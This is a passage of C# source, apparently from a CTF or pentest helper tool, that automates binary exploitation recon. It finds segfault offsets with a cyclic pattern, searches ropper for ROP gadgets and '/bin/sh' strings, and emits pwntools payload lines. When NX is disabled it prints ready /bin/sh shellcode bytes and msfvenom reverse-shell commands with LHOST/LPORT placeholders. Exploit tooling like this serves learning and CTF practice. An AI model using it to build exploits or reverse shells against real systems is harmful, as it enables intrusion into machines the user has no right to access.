'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5); List <string> dmesgOutput = General.GetProcessOutput("dmesg", ""); foreach (string item in dmesgOutput) { // segfault at 6161616c ip 000000006161616c x if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at ")) { // Console.WriteLine("-- Item: " + item); string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim(); // Console.WriteLine("-- segfaultHex: " + segfaultHex); string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray())); // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex); string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First(); Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos); } } } else { Console.WriteLine("- pwntools is not installed - Skipping auto segfault"); } } else if (architecture == Architecture.Linux64) { Console.WriteLine("Architecture: x64"); // TODO: Find where it segfaults, -1 } else if (architecture == Architecture.Windows) { Console.WriteLine("File Type: Windows (Unknown Architecture)"); } else { Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!"); } if (General.IsInstalledOnLinux("ropper")) { List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace(": ret;", ""); if (pwnItem.Length == 18) // x64 { pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address Console.WriteLine("- ret; (Only function calls) --> " + pwnItem); } else if (pwnItem.Length == 10) // x86 { Console.WriteLine("- ret; (Only function calls) --> " + pwnItem); } else { Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length); } } } ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]")) { if (item.Contains(": pop rdi; ret;")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace(": pop rdi; ret;", ""); if (pwnItem.Length == 18) { // TODO: p64 is only for x64 processes - Check first and implement x86 variant pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem); } else { Console.WriteLine("Not 18 - " + pwnItem.Length); } } else { Console.WriteLine("Unknown prr item: " + item); } } } ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace("/bin/sh", "").Trim();; if (pwnItem.Length == 10) { // TODO: p64 is only for x64 processes - Check first and implement x86 variant pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address } else { Console.WriteLine("Not 10 - " + pwnItem.Length); } Console.WriteLine("- /bin/sh --> " + pwnItem); } } ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]")) { if (item.Contains(": jmp esp;")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace(": jmp esp;", "").Trim(); if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x") { // 0x080414c3 -> 080414c3 string jmpesp = pwnItem.Remove(0, 2); // 080414c3 -> "\xc3\x14\x04\x08" jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2)); Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp); } else { Console.WriteLine("Invalud length - Bug Reelix!"); } } else { Console.WriteLine("Unknown jmp esp Item: " + item); } } } // // ropper --file sudo_pwn_file_here --string "/bin/sh" } else { Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search"); } if (General.IsInstalledOnLinux("rabin2")) { List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName); if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false")) { Console.WriteLine("- nx is disabled - You can run your own shellcode!"); if (architecture == Architecture.Linux64) // bits ? { Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"); } else if (architecture == Architecture.Linux86) { Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"); } else if (architecture == Architecture.Windows) { // -f c = Format (Else it just parses raw bytes instead of showing them) // -b = Bad characters if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32")) { Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\""); } else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64")) { Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\""); } else { // http://shell-storm.org/shellcode/ Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!"); } } else { // http://shell-storm.org/shellcode/ Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!"); } } else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true")) { Console.WriteLine("- nx enabled - No custom shellcode for you!"); } } else { Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check"); } if (General.IsInstalledOnLinux("objdump")) { bool hasMain = false; List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}"); foreach (string item in objdumpOutput) { if (item.Contains("call") && item.Contains("system")) // callq contains call { Console.WriteLine("- system --> " + item); } if (item.Trim().EndsWith(" <puts@plt>:")) { Console.WriteLine("- puts@plt (plt_puts) --> " + item); } if (item.Contains("puts@GLIBC")) { Console.WriteLine("- puts@GLIBC (got_puts) --> " + item); } if (item.Trim().EndsWith(" <main>:")) { hasMain = true; Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" "))); } } if (!hasMain) { objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}"); foreach (string item in objdumpOutput) { if (item.Trim().StartsWith("start address ")) { Console.WriteLine("- " + item); break; } } } objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}"); foreach (string item in objdumpOutput) { // .text = Name // " g" = Global if (item.Contains(".text") && item.Contains(" g ")) { Console.WriteLine("- Useful Symbol: " + item); } } // objdump -t ./file.elf | grep .text } else { Console.WriteLine("- objdump is not installed - Skipping syscalls"); } Console.WriteLine("Finished"); }